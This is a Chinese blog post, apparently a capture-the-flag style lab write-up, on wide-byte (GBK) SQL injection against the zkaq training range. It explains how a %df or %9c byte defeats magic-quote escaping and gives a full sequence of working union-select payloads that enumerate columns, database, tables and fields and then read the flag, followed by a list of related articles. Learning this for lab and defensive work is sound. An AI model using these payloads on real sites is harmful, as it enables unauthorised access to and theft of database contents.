SQL注入(宽字节注入)---zkaq

已于 2022-04-21 23:35:17 修改
阅读量945 收藏
点赞数
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-09 23:09:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/124070238
版权

1.概念

1.魔术引号(magic_quotes_gpc)

  • 概念:php的防御函数magic_quotes_gpc,函数的作用是判断解析用户提交的数据,例如包括post、get、cookie过来的数据增加转义字符“\”,已确保这些数据不会污染程序从而导致程序出现致命的错误。单引号、双引号、反斜线等字符都会被加上反斜线
  • 作用:当php的传参有特殊字符就会在前面加上“\”
  • 配置:魔术引号的配置开关位于php.ini文件中,默认是on。例:magic_quotes_gpc=On

2.宽字节注入原理:后端编码与数据库编码不一致导致的,我们可以利用gbk编码中文两个字节,通过拼凑%nf和/转义形成一个汉字的方式绕过,相当于我们所传的字符将反斜杠吃掉变成汉字。

1.靶场

1.pass-15—宽字节注入(一)

1)尝试进行sql注入

通过查看靶场的sql语言,发现是用’闭合的,尝试注入。payload:’ and 1=2 – qwe

发现单引号被转义了,尝试宽字节注入,payload: %9c’ and 1=2 – qwe

2)判断字段数

payload:%9c’ and order by 3 – qwe

使用%9c’ and order by 3 – qwe发现有结果,使用%df’ and order by 4 – qwe无结果,故确定字段数为3

3)查找库名

payload:%df’ union select 1,2,database() – qwe,得到库名为widechar

4)查找表名

payload:%df’ union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1 – qwe

得到表名china_flag

5)查找字段名

这里的表名使用十六进制代替

payload: %df’ union select 1,2,column_name from information_schema.columns where table_name = 0x6368696e615f666c6167 limit 1,1-- qwe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-039MOqQd-1649516885844)(https://pic.imgdb.cn/item/624ef095239250f7c567f5de.png)]

得到字段C_Flag

6)查询flag

payload: %df’ union select 1,2,C_Flag from china_flag limit 0,1 – qwe

real_plot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL宽字节注入
qq_64332865的博客
02-19 3351
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 8705
渗透测试-SQL注入宽字节注入
sql宽字节注入
qq_63157899的博客
04-07 4706
sql注入中最关键的一步就是将引号进行闭合,而常见的addslashes()函数、mysql_escape_string函数、get_magic_quotes_gpc()函数、mysql_real_escape_string()函数的使用将引号进行了转义,这时我们要绕过这些函数进行注入,宽字节注入就是其中一种方法。 何时能进行宽字节注入 1.mysql数据库使用GBK编码 2.对引号进行了转义(加\) 特殊情况: 1.数据库使用了安全的编码模式 2.使用了iconv() 函数进行一些特殊
SQL注入宽字节注入
m0_46467017的博客
08-09 1454
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,则称为宽字节。像等这些编码都是常说的宽字节,也就是只有两个字节。英文默认占一个字节,中午占两个字节。原理:宽字节注入发送的位置就是PHP发送请求到MYSQL时字符集使用设置一次编码。在使用PHP连接Mysql的时候,当设置时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入。...
sql注入--宽字节注入
pakho_C的博客
01-03 683
sql注入宽字节注入 靶场:sqli-labs-master 下载链接:靶场下载链接 第32关 php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); function check_addslashes($string) { $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\",
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
php登录页面实现-SQL注入
03-07
然而,如果不正确地处理用户输入,登录页面可能会遭受SQL注入攻击。下面将详细讨论PHP登录页面实现及其与SQL注入的相关知识点。 1. PHP登录页面基础: - `conn.php`:这个文件通常包含数据库连接代码,使用PHP的`...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入宽字节注入
qq_68163788的博客
01-31 1961
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
sql注入宽字节注入
最新发布
weixin_45653478的博客
04-09 628
如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL 语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没 有这种字符(也就不存在宽字节注入)。
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1112
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
SQL注入--宽字节注入
09-27 118
PHP测试代码: <?php // 面向对象写法 $id=addslashes($_GET[‘id’]); //获取id并转义预定义字符 // /$id=$_GET[‘id’]; $mysqli=new mysqli(‘localhost’,’root’,’root’,’test’); //连接数据库 指定数据库 if ($mysqli->conn...
SQL注入-宽字节注入
渗透笔记
01-13 694
1. GBK编码 gbk为中文编码,是一种双字节编码,将两个字节编译为一个汉字,其中第一个字节称为高位字节,第二个字节称为低位字节。 编码范围 高位81-FE 低位40-FE 2.宽字节注入原理 2.1php测试代码 error_reporting(0); $id = $_GET['id']; $id = addslashes($id);
SQL注入——宽字节注入
一只web狗
06-21 501
宽字节注入简介
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值